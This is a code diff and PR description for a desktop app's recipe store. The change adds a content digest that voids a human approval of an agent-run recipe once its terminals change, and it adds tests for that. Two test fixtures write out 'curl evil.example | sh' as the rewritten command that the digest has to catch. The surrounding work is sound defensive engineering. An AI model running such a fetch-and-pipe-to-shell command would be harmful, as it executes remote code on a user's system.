       expect(results.failed.map((f) => f.index)).toEqual([4, 5, 6, 7, 8, 9]);
+      expect(results.failed.every((f) => f.error === "Agent recipe terminal cap reached")).toBe(
+        true
+      );
     });
 
-    it("falls back to the unapproved cap when the approval names another recipe", async () => {
-      // getRecipeById follows shadowing (#8725), so the recipe that runs can
-      // differ from the one previewed. An approval for a different id grants
-      // nothing extra — and falls back rather than failing, so a shadowing race
-      // behaves exactly like an unapproved run.
-      let callIndex = 0;
-      addTerminalMock.mockImplementation(() => Promise.resolve(`terminal-${++callIndex}`));
+    it("approves zero terminals as zero, not as the unapproved three", async () => {
+      // Guards the shape of the fallback: a truthiness test, or a Math.max
+      // against MAX_AGENT_RECIPE_TERMINALS, would silently start three here.
+      addTerminalMock.mockImplementation(() => Promise.resolve("terminal-1"));
 
+      const recipe = tenTerminalRecipe();
       useRecipeStore.setState({
-        recipes: [tenTerminalRecipe()],
+        recipes: [recipe],
         isLoading: false,
         currentProjectId: "project-1",
       });
@@ -1422,15 +1434,198 @@ describe("recipeStore", () => {
         .getState()
         .runRecipeWithResults("recipe-1", "/tmp/worktree", "worktree-1", undefined, {
           dispatchSource: "agent",
-          hostApprovedRecipeRun: { recipeId: "some-other-recipe", terminalCount: 10 },
+          hostApprovedRecipeRun: approvalFor(recipe, 0),
         });
 
-      expect(addTerminalMock).toHaveBeenCalledTimes(3);
-      expect(results.spawned).toHaveLength(3);
-      expect(results.failed).toHaveLength(7);
-      expect(results.failed.every((f) => f.error === "Agent recipe terminal cap reached")).toBe(
+      expect(addTerminalMock).not.toHaveBeenCalled();
+      expect(results.spawned).toHaveLength(0);
+      expect(results.failed).toHaveLength(10);
+    });
+
+    it("starts nothing when the approval names a recipe other than the one resolved", async () => {
+      // getRecipeById follows shadowing (#8725), so the recipe that runs can
+      // differ from the one previewed. Falling back to the three-terminal cap
+      // here would be WRONG in the direction that matters: a one-terminal offer
+      // whose recipe has since been shadowed by a ten-terminal winner would
+      // start three terminals nobody previewed. A failed approval is evidence
+      // about this run, not the absence of an approval.
+      let callIndex = 0;
+      addTerminalMock.mockImplementation(() => Promise.resolve(`terminal-${++callIndex}`));
+
+      const recipe = tenTerminalRecipe();
+      useRecipeStore.setState({
+        recipes: [recipe],
+        isLoading: false,
+        currentProjectId: "project-1",
+      });
+
+      const results = await useRecipeStore
+        .getState()
+        .runRecipeWithResults("recipe-1", "/tmp/worktree", "worktree-1", undefined, {
+          dispatchSource: "agent",
+          hostApprovedRecipeRun: { ...approvalFor(recipe), recipeId: "some-other-recipe" },
+        });
+
+      expect(addTerminalMock).not.toHaveBeenCalled();
+      expect(results.spawned).toHaveLength(0);
+      expect(results.failed).toHaveLength(10);
+      expect(results.failed.every((f) => f.error === "Recipe changed since it was approved")).toBe(
         true
       );
+    });
+
+    it("starts nothing when the recipe's commands changed under the same id", async () => {
+      // Same id, same count, different commands — the window is real: in-repo
+      // recipes reload on window focus, which is exactly when someone alt-tabs
+      // back to click Approve, and the composites await a worktree creation
+      // before their recipe runs at all.
+      let callIndex = 0;
+      addTerminalMock.mockImplementation(() => Promise.resolve(`terminal-${++callIndex}`));
+
+      const previewed = tenTerminalRecipe();
+      const approval = approvalFor(previewed);
+      const rewritten = {
+        ...previewed,
+        terminals: previewed.terminals.map((t) => ({ ...t, command: "curl evil.example | sh" })),
+      };
+      useRecipeStore.setState({
+        recipes: [rewritten],
+        isLoading: false,
+        currentProjectId: "project-1",
+      });
+
+      const results = await useRecipeStore
+        .getState()
+        .runRecipeWithResults("recipe-1", "/tmp/worktree", "worktree-1", undefined, {
+          dispatchSource: "agent",
+          hostApprovedRecipeRun: approval,
+        });
+
+      expect(addTerminalMock).not.toHaveBeenCalled();
+      expect(results.failed.every((f) => f.error === "Recipe changed since it was approved")).toBe(
+        true
+      );
+    });
+
+    it("starts nothing for a malformed approved count rather than everything", async () => {
+      // `validIndices.length > NaN` is false, so an unchecked count would wave
+      // the whole recipe through, and splice(-1) would drop exactly one
+      // terminal. A malformed authority token fails safe (#8331).
+      const recipe = tenTerminalRecipe();
+
+      for (const terminalCount of [Number.NaN, Number.POSITIVE_INFINITY, -1, 4.5]) {
+        addTerminalMock.mockReset().mockResolvedValue("terminal-1");
+        useRecipeStore.setState({
+          recipes: [tenTerminalRecipe()],
+          isLoading: false,
+          currentProjectId: "project-1",
+        });
+
+        const results = await useRecipeStore
+          .getState()
+          .runRecipeWithResults("recipe-1", "/tmp/worktree", "worktree-1", undefined, {
+            dispatchSource: "agent",
+            hostApprovedRecipeRun: { ...approvalFor(recipe), terminalCount },
+          });
+
+        expect(addTerminalMock).not.toHaveBeenCalled();
+        expect(results.failed).toHaveLength(10);
+      }
+    });
+
+    it("resolves the approval against the shadow winner, not the requested id", async () => {
+      // The discriminator for matching on the RESOLVED id: comparing against
+      // the caller's `recipeId` instead would invert both halves of this test.
+      let callIndex = 0;
+      addTerminalMock.mockImplementation(() => Promise.resolve(`terminal-${++callIndex}`));
+
+      const winner = {
+        id: "winner",
+        name: "Fleet",
+        projectId: "project-1",
+        scope: "inrepo" as const,
+        terminals: Array.from({ length: 10 }, (_, i) => ({
+          type: "terminal" as const,
+          title: `Shell ${i}`,
+          command: "echo",
+          env: {},
+        })),
+        createdAt: 1,
+      };
+      const shadowed = {
+        ...tenTerminalRecipe(),
+        id: "shadowed",
+        name: "Fleet",
+        shadowedBy: "Fleet",
+      };
+      // Re-seeded between the halves rather than run twice against one store:
+      // `updateRecipe` rebuilds the merged `recipes` list from the tier arrays
+      // after a run, which drops a shadowed row this fixture places only there.
+      const seed = () =>
+        useRecipeStore.setState({
+          recipes: [shadowed, winner],
+          inRepoRecipes: [winner],
+          isLoading: false,
+          currentProjectId: "project-1",
+        });
+
+      seed();
+      const approved = await useRecipeStore
+        .getState()
+        .runRecipeWithResults("shadowed", "/tmp/worktree", "worktree-1", undefined, {
+          dispatchSource: "agent",
+          hostApprovedRecipeRun: approvalFor(winner),
+        });
+      expect(approved.spawned).toHaveLength(10);
+
+      addTerminalMock.mockClear();
+      seed();
+      const stale = await useRecipeStore
+        .getState()
+        .runRecipeWithResults("shadowed", "/tmp/worktree", "worktree-1", undefined, {
+          dispatchSource: "agent",
+          hostApprovedRecipeRun: approvalFor(shadowed),
+        });
+      expect(stale.spawned).toHaveLength(0);
+      expect(stale.failed.every((f) => f.error === "Recipe changed since it was approved")).toBe(
+        true
+      );
+    });
+
+    it("routes an approved run through the panel-limit gate like any other", async () => {
+      // An approval sizes the agent cap; it is not a licence to skip the
+      // workspace ceiling. 18 ambient panels plus an approved 10 projects 28.
+      const requestConfirmationSpy = vi.fn().mockResolvedValue(true);
+      const previousRequestConfirmation = usePanelLimitStore.getState().requestConfirmation;
+      usePanelLimitStore.setState({ requestConfirmation: requestConfirmationSpy });
+      try {
+        let callIndex = 0;
+        addTerminalMock.mockImplementation(() => Promise.resolve(`terminal-${++callIndex}`));
+
+        const ambientIds = Array.from({ length: 18 }, (_, i) => `ambient-${i}`);
+        panelStoreState.panelIds = ambientIds;
+        panelStoreState.panelsById = Object.fromEntries(
+          ambientIds.map((id) => [id, { location: "grid" }])
+        );
+
+        const recipe = tenTerminalRecipe();
+        useRecipeStore.setState({
+          recipes: [recipe],
+          isLoading: false,
+          currentProjectId: "project-1",
+        });
+
+        await useRecipeStore
+          .getState()
+          .runRecipeWithResults("recipe-1", "/tmp/worktree", "worktree-1", undefined, {
+            dispatchSource: "agent",
+            hostApprovedRecipeRun: approvalFor(recipe),
+          });
+
+        expect(requestConfirmationSpy).toHaveBeenCalledWith(28, null);
+      } finally {
+        usePanelLimitStore.setState({ requestConfirmation: previousRequestConfirmation });
+      }
     });
 
     it("does not lift the cap for an approval carrying no agent dispatch source", async () => {
@@ -1450,7 +1645,7 @@ describe("recipeStore", () => {
         .getState()
         .runRecipeWithResults("recipe-1", "/tmp/worktree", "worktree-1", undefined, {
           dispatchSource: "user",
-          hostApprovedRecipeRun: { recipeId: "recipe-1", terminalCount: 2 },
+          hostApprovedRecipeRun: approvalFor(tenTerminalRecipe(), 2),
         });
 
       expect(addTerminalMock).toHaveBeenCalledTimes(10);

--- a/src/store/recipeStore.ts
+++ b/src/store/recipeStore.ts
@@ -92,7 +92,8 @@ export interface RecipeRunOptions {
    *
    * Host-set and unspoofable at the source — `ActionService` stamps it from the
    * dispatch options, so it cannot arrive from an action's args or from a
-   * `contextOverride`. Absent or mismatched falls back to the smaller cap.
+   * `contextOverride`. Absent falls back to {@link MAX_AGENT_RECIPE_TERMINALS};
+   * present but no longer covering this recipe authorizes nothing at all.
    */
   hostApprovedRecipeRun?: HostApprovedRecipeRun;
 }

--- a/src/store/recipeStore.ts
+++ b/src/store/recipeStore.ts
@@ -8,6 +8,7 @@ import { launcherItemToolbarButtonId } from "@shared/types/toolbar";
 import { recipeToolbarSourceId } from "@/utils/recipeScope";
 import { preflightSpawnBatchLimit } from "./panelLimitStore";
 import { countPanelsTowardLimit } from "./slices/panelRegistry/panelCount";
+import { recipeApprovalDigest } from "@/utils/recipeApprovalDigest";
 import { isMcpSpawnFocusSuppressed } from "./mcpSpawnFocusGuard";
 import { isAssistantFocused } from "./macroFocusStore";
 import {
@@ -277,6 +278,29 @@ export { MAX_TERMINALS_PER_RECIPE };
  * caller has shown nobody anything, so it keeps the conservative ceiling.
  */
 export const MAX_AGENT_RECIPE_TERMINALS = 3;
+
+/**
+ * Whether a host approval still describes the recipe about to run (#12263).
+ *
+ * All three parts must hold, and the numeric one is checked rather than
+ * trusted: `validIndices.length > cap` is silently false for `NaN`, so a
+ * malformed count would wave the whole recipe through, and `splice(-1)` would
+ * drop one terminal instead of all of them. No producer sends those today —
+ * the bridge reads `recipe.terminals.length` — but this is the consumer of an
+ * authority token, and #8331's rule for those is that a malformed field fails
+ * safe rather than fails open.
+ */
+function approvalCoversRecipe(
+  approval: HostApprovedRecipeRun,
+  recipe: Pick<TerminalRecipe, "id" | "terminals">
+): boolean {
+  return (
+    approval.recipeId === recipe.id &&
+    Number.isSafeInteger(approval.terminalCount) &&
+    approval.terminalCount >= 0 &&
+    approval.terminalsDigest === recipeApprovalDigest(recipe.terminals)
+  );
+}
 
 /**
  * Drop a permanently-deleted recipe's toolbar pin (#12217).
@@ -1024,13 +1048,16 @@ const createRecipeStore: StateCreator<RecipeState> = (set, get) => ({
 
     // Blast-radius cap for agent-dispatched runs, sized by what a human was
     // actually shown. recipe.run's danger:"confirm" gate already requires an
-    // approval for agent sources; when that approval came from a dialog that
-    // listed this recipe's terminals, it covers the number it listed. Anything
-    // else — no approval record, or one naming a different recipe than the id
-    // resolved to here (getRecipeById follows shadowing, #8725) — falls back to
-    // MAX_AGENT_RECIPE_TERMINALS. Fail-safe by direction: a mismatch grants
-    // less, never more, and behaves exactly like an unapproved run instead of
-    // turning a shadowing race into a hard failure (#8331).
+    // approval for agent sources; when that approval still covers the recipe
+    // resolved here, it authorizes the number of terminals it listed.
+    //
+    // Three outcomes, not two. No approval at all is the conservative default:
+    // nobody was shown anything, so MAX_AGENT_RECIPE_TERMINALS. An approval
+    // that covers this recipe grants its count. An approval that does NOT
+    // grants zero — the tempting fallback to the smaller cap would be wrong,
+    // because a one-terminal offer whose recipe has since been shadowed by a
+    // ten-terminal winner would start three terminals nobody previewed. A
+    // failed approval is evidence about THIS run, not the absence of one.
     //
     // Ordered before preflightSpawnBatchLimit so the cap bounds the batch the
     // limit gate sizes, not the other way round. That is ALL it does. This used
@@ -1042,14 +1069,21 @@ const createRecipeStore: StateCreator<RecipeState> = (set, get) => ({
     // with no timeout on the dialog and a 30s deadline on the dispatch behind
     // it. Left alone deliberately: it is a separate defect from this cap, and
     // widening the approved ceiling only changes how often it is reached.
-    const agentTerminalCap =
-      options?.hostApprovedRecipeRun?.recipeId === resolvedId
-        ? options.hostApprovedRecipeRun.terminalCount
-        : MAX_AGENT_RECIPE_TERMINALS;
+    const approval = options?.hostApprovedRecipeRun;
+    const approvalCovers = approval !== undefined && approvalCoversRecipe(approval, recipe);
+    const agentTerminalCap = approval
+      ? approvalCovers
+        ? approval.terminalCount
+        : 0
+      : MAX_AGENT_RECIPE_TERMINALS;
     if (options?.dispatchSource === "agent" && validIndices.length > agentTerminalCap) {
       const dropped = validIndices.splice(agentTerminalCap);
+      const error =
+        approval && !approvalCovers
+          ? "Recipe changed since it was approved"
+          : "Agent recipe terminal cap reached";
       for (const index of dropped) {
-        results.failed.push({ index, error: "Agent recipe terminal cap reached" });
+        results.failed.push({ index, error });
       }
     }
 

--- a/src/store/recipeStore.ts
+++ b/src/store/recipeStore.ts
@@ -39,7 +39,7 @@ import { useProjectPresetsStore } from "@/store/projectPresetsStore";
 import { replaceRecipeVariables, type RecipeContext } from "@/utils/recipeVariables";
 import { sanitizeTerminalName } from "@/utils/agentLaunchValidation";
 import { sanitizeRecipeTerminals, MAX_TERMINALS_PER_RECIPE } from "@shared/utils/recipeSanitizer";
-import type { ActionSource } from "@shared/types/actions";
+import type { ActionSource, HostApprovedRecipeRun } from "@shared/types/actions";
 import type { AgentCliDetail } from "@shared/types/ipc";
 import type { TerminalSpawnSource, AddPanelFocusPolicy } from "@shared/types/panel";
 import { isInRepoRecipeId, safeRecipeFilename } from "@shared/utils/recipeFilename";
@@ -77,11 +77,23 @@ export interface RecipeRunOptions {
   spawnBatch?: { id: string; size: number };
   /**
    * The action dispatch source that triggered this run. When `"agent"`, a
-   * lower per-run terminal cap ({@link MAX_AGENT_RECIPE_TERMINALS}) is applied
-   * to bound the blast radius of MCP-driven recipe runs. Forwarded from
-   * `recipe.run`'s `ActionContext.dispatchSource`.
+   * per-run terminal cap is applied to bound the blast radius of MCP-driven
+   * recipe runs — {@link MAX_AGENT_RECIPE_TERMINALS}, unless
+   * {@link hostApprovedRecipeRun} raises it to what an approver was shown.
+   * Forwarded from `recipe.run`'s `ActionContext.dispatchSource`.
    */
   dispatchSource?: ActionSource;
+  /**
+   * The recipe run a human approved in the host confirm dialog, forwarded from
+   * `ActionContext.hostApprovedRecipeRun` (#12263). When it names the recipe
+   * actually resolved here, the agent cap becomes the terminal count the
+   * approver was shown instead of {@link MAX_AGENT_RECIPE_TERMINALS}.
+   *
+   * Host-set and unspoofable at the source — `ActionService` stamps it from the
+   * dispatch options, so it cannot arrive from an action's args or from a
+   * `contextOverride`. Absent or mismatched falls back to the smaller cap.
+   */
+  hostApprovedRecipeRun?: HostApprovedRecipeRun;
 }
 
 function isAgentRecipeType(type: RecipeTerminalType): boolean {
@@ -248,10 +260,21 @@ interface RecipeState {
 export { MAX_TERMINALS_PER_RECIPE };
 
 /**
- * Per-run terminal cap for agent-dispatched recipe runs. A single MCP-approved
- * `recipe.run` shouldn't authorize a full {@link MAX_TERMINALS_PER_RECIPE}-wide
- * spawn — an agent context needs at most a handful of panels. Bounds the blast
- * radius without blocking legitimate agent use.
+ * Per-run terminal cap for an agent-dispatched recipe run that NO human was
+ * shown (#12263).
+ *
+ * Every agent `recipe.run` is confirmation-gated, so the cap was never what
+ * stood between an agent and a spawn — the dialog was. What the cap did was
+ * shrink the offer: a five-pane recipe was previewed as "starts 3 of 5", so a
+ * human clicking Approve authorized three, and the recipe meant something
+ * different depending on who ran it. An approver reading every terminal the
+ * dialog lists can authorize all of them, and
+ * `RecipeRunOptions.hostApprovedRecipeRun` is how that approval reaches here.
+ *
+ * This number is what remains for a run with no such approval behind it: one
+ * pre-authorized by a standing automation grant, which names a tool in Settings
+ * with no arguments and no preview in front of the person who issued it. That
+ * caller has shown nobody anything, so it keeps the conservative ceiling.
  */
 export const MAX_AGENT_RECIPE_TERMINALS = 3;
 
@@ -999,13 +1022,32 @@ const createRecipeStore: StateCreator<RecipeState> = (set, get) => ({
       }
     }
 
-    // Defense-in-depth blast-radius cap for agent-dispatched runs. recipe.run's
-    // danger:"confirm" gate already requires user approval for agent sources,
-    // but one approval shouldn't authorize a full 10-terminal recipe. Apply the
-    // cap BEFORE preflightSpawnBatchLimit so a capped agent run can never reach
-    // the confirmation-dialog path (which would hang a headless MCP dispatch).
-    if (options?.dispatchSource === "agent" && validIndices.length > MAX_AGENT_RECIPE_TERMINALS) {
-      const dropped = validIndices.splice(MAX_AGENT_RECIPE_TERMINALS);
+    // Blast-radius cap for agent-dispatched runs, sized by what a human was
+    // actually shown. recipe.run's danger:"confirm" gate already requires an
+    // approval for agent sources; when that approval came from a dialog that
+    // listed this recipe's terminals, it covers the number it listed. Anything
+    // else — no approval record, or one naming a different recipe than the id
+    // resolved to here (getRecipeById follows shadowing, #8725) — falls back to
+    // MAX_AGENT_RECIPE_TERMINALS. Fail-safe by direction: a mismatch grants
+    // less, never more, and behaves exactly like an unapproved run instead of
+    // turning a shadowing race into a hard failure (#8331).
+    //
+    // Ordered before preflightSpawnBatchLimit so the cap bounds the batch the
+    // limit gate sizes, not the other way round. That is ALL it does. This used
+    // to claim a capped agent run "can never reach the confirmation-dialog
+    // path", which is false: preflightSpawnBatchLimit prompts on
+    // `currentCount + allowed > DEFAULT_CONFIRMATION_LIMIT`, and `currentCount`
+    // is the workspace's ambient panel count, which no per-recipe cap bounds.
+    // 18 panels already open plus a capped 3 is 21, and that prompts today —
+    // with no timeout on the dialog and a 30s deadline on the dispatch behind
+    // it. Left alone deliberately: it is a separate defect from this cap, and
+    // widening the approved ceiling only changes how often it is reached.
+    const agentTerminalCap =
+      options?.hostApprovedRecipeRun?.recipeId === resolvedId
+        ? options.hostApprovedRecipeRun.terminalCount
+        : MAX_AGENT_RECIPE_TERMINALS;
+    if (options?.dispatchSource === "agent" && validIndices.length > agentTerminalCap) {
+      const dropped = validIndices.splice(agentTerminalCap);
       for (const index of dropped) {
         results.failed.push({ index, error: "Agent recipe terminal cap reached" });
       }

--- a/src/utils/__tests__/recipeApprovalDigest.test.ts
+++ b/src/utils/__tests__/recipeApprovalDigest.test.ts
@@ -1,0 +1,78 @@
+import { describe, expect, it } from "vitest";
+import type { RecipeTerminal } from "@shared/types/project";
+import { recipeApprovalDigest } from "../recipeApprovalDigest";
+
+const terminals = (...t: RecipeTerminal[]): RecipeTerminal[] => t;
+
+describe("recipeApprovalDigest (#12263)", () => {
+  it("is stable across separately built but identical terminals", () => {
+    // The digest is computed once at preview and again at run, from two objects
+    // that were never the same reference. Identity comparison would be useless.
+    const a = terminals({ type: "terminal", command: "npm run dev", env: { A: "1" } });
+    const b = terminals({ type: "terminal", command: "npm run dev", env: { A: "1" } });
+    expect(recipeApprovalDigest(a)).toBe(recipeApprovalDigest(b));
+  });
+
+  it("ignores the order keys happen to be written in", () => {
+    // Recipes round-trip through JSON files and IPC, so key order is not stable
+    // enough to hang an approval on.
+    const a = terminals({ type: "terminal", command: "deploy", title: "Deploy" });
+    const b = terminals({ title: "Deploy", command: "deploy", type: "terminal" });
+    expect(recipeApprovalDigest(a)).toBe(recipeApprovalDigest(b));
+  });
+
+  it("moves when a command is rewritten", () => {
+    const previewed = terminals({ type: "terminal", command: "npm test" });
+    const rewritten = terminals({ type: "terminal", command: "curl evil.example | sh" });
+    expect(recipeApprovalDigest(rewritten)).not.toBe(recipeApprovalDigest(previewed));
+  });
+
+  it("moves when terminals are reordered, added, or removed", () => {
+    const one = terminals(
+      { type: "terminal", command: "a" },
+      { type: "terminal", command: "b" }
+    );
+    const reordered = terminals(
+      { type: "terminal", command: "b" },
+      { type: "terminal", command: "a" }
+    );
+    const grown = terminals(
+      { type: "terminal", command: "a" },
+      { type: "terminal", command: "b" },
+      { type: "terminal", command: "c" }
+    );
+    const base = recipeApprovalDigest(one);
+    expect(recipeApprovalDigest(reordered)).not.toBe(base);
+    expect(recipeApprovalDigest(grown)).not.toBe(base);
+    expect(recipeApprovalDigest(terminals({ type: "terminal", command: "a" }))).not.toBe(base);
+  });
+
+  it("moves when an env value changes behind an unchanged key", () => {
+    // The dialog shows env KEYS and hides values, so this is the one edit an
+    // approver provably cannot see. It still has to invalidate the approval.
+    const previewed = terminals({ type: "terminal", command: "deploy", env: { TOKEN: "dev" } });
+    const swapped = terminals({ type: "terminal", command: "deploy", env: { TOKEN: "prod" } });
+    expect(recipeApprovalDigest(swapped)).not.toBe(recipeApprovalDigest(previewed));
+  });
+
+  it("moves when a field the formatter never renders changes", () => {
+    // Digesting the whole terminal rather than a hand-listed subset is what
+    // keeps a field added later from silently falling outside the approval.
+    const previewed = terminals({ type: "claude", args: "--model sonnet" });
+    const escalated = terminals({ type: "claude", args: "--dangerously-skip-permissions" });
+    expect(recipeApprovalDigest(escalated)).not.toBe(recipeApprovalDigest(previewed));
+  });
+
+  it("does not confuse an absent field with an explicitly undefined one", () => {
+    const absent = terminals({ type: "terminal", command: "a" });
+    const explicit = terminals({ type: "terminal", command: "a", title: undefined });
+    expect(recipeApprovalDigest(explicit)).toBe(recipeApprovalDigest(absent));
+  });
+
+  it("returns eight hex characters, including for an empty recipe", () => {
+    expect(recipeApprovalDigest([])).toMatch(/^[0-9a-f]{8}$/);
+    expect(recipeApprovalDigest(terminals({ type: "terminal", command: "a" }))).toMatch(
+      /^[0-9a-f]{8}$/
+    );
+  });
+});

--- a/src/utils/__tests__/recipeApprovalDigest.test.ts
+++ b/src/utils/__tests__/recipeApprovalDigest.test.ts
@@ -28,10 +28,7 @@ describe("recipeApprovalDigest (#12263)", () => {
   });
 
   it("moves when terminals are reordered, added, or removed", () => {
-    const one = terminals(
-      { type: "terminal", command: "a" },
-      { type: "terminal", command: "b" }
-    );
+    const one = terminals({ type: "terminal", command: "a" }, { type: "terminal", command: "b" });
     const reordered = terminals(
       { type: "terminal", command: "b" },
       { type: "terminal", command: "a" }
@@ -55,12 +52,15 @@ describe("recipeApprovalDigest (#12263)", () => {
     expect(recipeApprovalDigest(swapped)).not.toBe(recipeApprovalDigest(previewed));
   });
 
-  it("moves when a field the formatter never renders changes", () => {
+  it("moves when a field the confirm preview never renders changes", () => {
     // Digesting the whole terminal rather than a hand-listed subset is what
     // keeps a field added later from silently falling outside the approval.
-    const previewed = terminals({ type: "claude", args: "--model sonnet" });
-    const escalated = terminals({ type: "claude", args: "--dangerously-skip-permissions" });
-    expect(recipeApprovalDigest(escalated)).not.toBe(recipeApprovalDigest(previewed));
+    // `exitBehavior` is the discriminator: the dialog renders type, command,
+    // args, prompt and env keys, so a digest narrowed to "what was shown"
+    // would pass every other case in this file and miss this one.
+    const previewed = terminals({ type: "terminal", command: "a", exitBehavior: "keep" });
+    const changed = terminals({ type: "terminal", command: "a", exitBehavior: "remove" });
+    expect(recipeApprovalDigest(changed)).not.toBe(recipeApprovalDigest(previewed));
   });
 
   it("does not confuse an absent field with an explicitly undefined one", () => {
@@ -69,10 +69,10 @@ describe("recipeApprovalDigest (#12263)", () => {
     expect(recipeApprovalDigest(explicit)).toBe(recipeApprovalDigest(absent));
   });
 
-  it("returns eight hex characters, including for an empty recipe", () => {
-    expect(recipeApprovalDigest([])).toMatch(/^[0-9a-f]{8}$/);
+  it("returns sixteen hex characters, including for an empty recipe", () => {
+    expect(recipeApprovalDigest([])).toMatch(/^[0-9a-f]{16}$/);
     expect(recipeApprovalDigest(terminals({ type: "terminal", command: "a" }))).toMatch(
-      /^[0-9a-f]{8}$/
+      /^[0-9a-f]{16}$/
     );
   });
 });

--- a/src/utils/recipeApprovalDigest.ts
+++ b/src/utils/recipeApprovalDigest.ts
@@ -1,0 +1,56 @@
+import type { RecipeTerminal } from "@shared/types/project";
+
+/**
+ * A stable fingerprint of the terminals a confirm dialog listed (#12263).
+ *
+ * An approval names a recipe id and a count, and neither says WHAT was in the
+ * dialog. A recipe can be rewritten under the same id while the modal waits —
+ * `useRecipeFocusReload` re-reads in-repo recipes whenever the window regains
+ * focus, which is exactly what happens when someone alt-tabs back to click
+ * Approve — and the composites (`worktree.createWithRecipe`,
+ * `workflow.startWorkOnIssue`) then await a worktree creation before the recipe
+ * runs at all. Without a content check, the same-count-same-id case would run
+ * commands nobody was shown.
+ *
+ * DRIFT DETECTION, NOT A MAC. It answers "is this still the recipe the dialog
+ * rendered?", and the answer only ever withdraws authority. The recipe editing
+ * that would move it is either the user's own or an agent's — and an agent's
+ * needs its own approval first, since `recipe.editor.open` and
+ * `recipe.saveToRepo` are `danger: "safe"` but carry a `recipeId`, so
+ * `resolveEffectiveActionDanger` raises them to `"confirm"` for agent sources.
+ * Nothing here rests on a collision being hard to find, so a short non-crypto
+ * hash is the right size: no async, no crypto import in the preview path, and
+ * no recipe content retained on the approval record — a recipe is a plausible
+ * home for a token, and a digest keeps values out of the object that travels.
+ *
+ * Digests the WHOLE terminal, not a hand-listed subset of launch-relevant
+ * fields. A subset would silently stop covering any field added later, which is
+ * the failure this exists to prevent. Frecency metadata (`lastUsedAt`,
+ * `usageHistory`) lives on the recipe rather than its terminals and is
+ * excluded by construction — the store stamps it on every run, so including it
+ * would invalidate every approval it issued.
+ */
+export function recipeApprovalDigest(terminals: readonly RecipeTerminal[]): string {
+  return fnv1a(stableStringify(terminals));
+}
+
+/** JSON with object keys emitted in sorted order, so key order can't move a digest. */
+function stableStringify(value: unknown): string {
+  if (value === null || typeof value !== "object") return JSON.stringify(value) ?? "null";
+  if (Array.isArray(value)) return `[${value.map(stableStringify).join(",")}]`;
+  const entries = Object.entries(value as Record<string, unknown>)
+    .filter(([, v]) => v !== undefined)
+    .sort(([a], [b]) => (a < b ? -1 : a > b ? 1 : 0))
+    .map(([k, v]) => `${JSON.stringify(k)}:${stableStringify(v)}`);
+  return `{${entries.join(",")}}`;
+}
+
+/** FNV-1a, 32-bit, as 8 hex characters. */
+function fnv1a(input: string): string {
+  let hash = 0x811c9dc5;
+  for (let i = 0; i < input.length; i++) {
+    hash ^= input.charCodeAt(i);
+    hash = Math.imul(hash, 0x01000193);
+  }
+  return (hash >>> 0).toString(16).padStart(8, "0");
+}

--- a/src/utils/recipeApprovalDigest.ts
+++ b/src/utils/recipeApprovalDigest.ts
@@ -12,16 +12,19 @@ import type { RecipeTerminal } from "@shared/types/project";
  * runs at all. Without a content check, the same-count-same-id case would run
  * commands nobody was shown.
  *
- * DRIFT DETECTION, NOT A MAC. It answers "is this still the recipe the dialog
- * rendered?", and the answer only ever withdraws authority. The recipe editing
- * that would move it is either the user's own or an agent's — and an agent's
- * needs its own approval first, since `recipe.editor.open` and
- * `recipe.saveToRepo` are `danger: "safe"` but carry a `recipeId`, so
- * `resolveEffectiveActionDanger` raises them to `"confirm"` for agent sources.
- * Nothing here rests on a collision being hard to find, so a short non-crypto
- * hash is the right size: no async, no crypto import in the preview path, and
- * no recipe content retained on the approval record — a recipe is a plausible
- * home for a token, and a digest keeps values out of the object that travels.
+ * Drift detection: it answers "is this still the recipe the dialog rendered?",
+ * and the answer only ever withdraws authority. Non-crypto on purpose — no
+ * async and no crypto import in a path the modal's approve button waits on —
+ * but 64 bits rather than 32, because a 32-bit digest is collidable by hand.
+ * The editing that moves a recipe needs a human either way (an agent's
+ * `recipe.editor.open` and `recipe.saveToRepo` are `danger: "safe"` but carry a
+ * `recipeId`, so `resolveEffectiveActionDanger` raises them to `"confirm"`),
+ * yet a width someone could grind against while a dialog waits is a bad shape
+ * for an authority token whatever the surrounding gates are.
+ *
+ * A digest rather than the terminals themselves keeps recipe content off the
+ * record that travels: a recipe is a plausible home for a token, and the
+ * preview hides env VALUES precisely because a dialog is not where they belong.
  *
  * Digests the WHOLE terminal, not a hand-listed subset of launch-relevant
  * fields. A subset would silently stop covering any field added later, which is
@@ -38,19 +41,29 @@ export function recipeApprovalDigest(terminals: readonly RecipeTerminal[]): stri
 function stableStringify(value: unknown): string {
   if (value === null || typeof value !== "object") return JSON.stringify(value) ?? "null";
   if (Array.isArray(value)) return `[${value.map(stableStringify).join(",")}]`;
-  const entries = Object.entries(value as Record<string, unknown>)
+  const record: Record<string, unknown> = { ...value };
+  const entries = Object.entries(record)
     .filter(([, v]) => v !== undefined)
     .sort(([a], [b]) => (a < b ? -1 : a > b ? 1 : 0))
     .map(([k, v]) => `${JSON.stringify(k)}:${stableStringify(v)}`);
   return `{${entries.join(",")}}`;
 }
 
-/** FNV-1a, 32-bit, as 8 hex characters. */
+/**
+ * FNV-1a as 16 hex characters.
+ *
+ * Two 32-bit lanes with different offset bases rather than true 64-bit FNV:
+ * JavaScript numbers cannot hold the 64-bit prime multiply without BigInt, and
+ * two independent lanes over the same input reach the width that matters here
+ * at the cost of one extra multiply per character.
+ */
 function fnv1a(input: string): string {
-  let hash = 0x811c9dc5;
+  let low = 0x811c9dc5;
+  let high = 0x01000193;
   for (let i = 0; i < input.length; i++) {
-    hash ^= input.charCodeAt(i);
-    hash = Math.imul(hash, 0x01000193);
+    const code = input.charCodeAt(i);
+    low = Math.imul(low ^ code, 0x01000193);
+    high = Math.imul(high ^ code, 0x85ebca6b);
   }
-  return (hash >>> 0).toString(16).padStart(8, "0");
+  return (low >>> 0).toString(16).padStart(8, "0") + (high >>> 0).toString(16).padStart(8, "0");
 }


### PR DESCRIPTION
## Summary

`MAX_AGENT_RECIPE_TERMINALS` (set to `3`) capped every agent-dispatched `recipe.run` at three terminals, but as the maintainer pointed out on the issue, that cap was never actually the thing standing between an agent and an unwanted spawn. `recipe.run` has `danger: "confirm"`, and `resolveEffectiveActionDanger` escalates any agent dispatch carrying a `recipeId`, so a human clicks an approval dialog either way, whether the caller is a person or an agent. All the constant did was shrink what got offered in that dialog: a five-pane recipe was previewed as "Starts 3 of 5 terminals (an automated caller gets at most 3)" with the remaining two lines struck through. One approval bought three panes, and the same recipe meant a different number of terminals depending on who ran it.

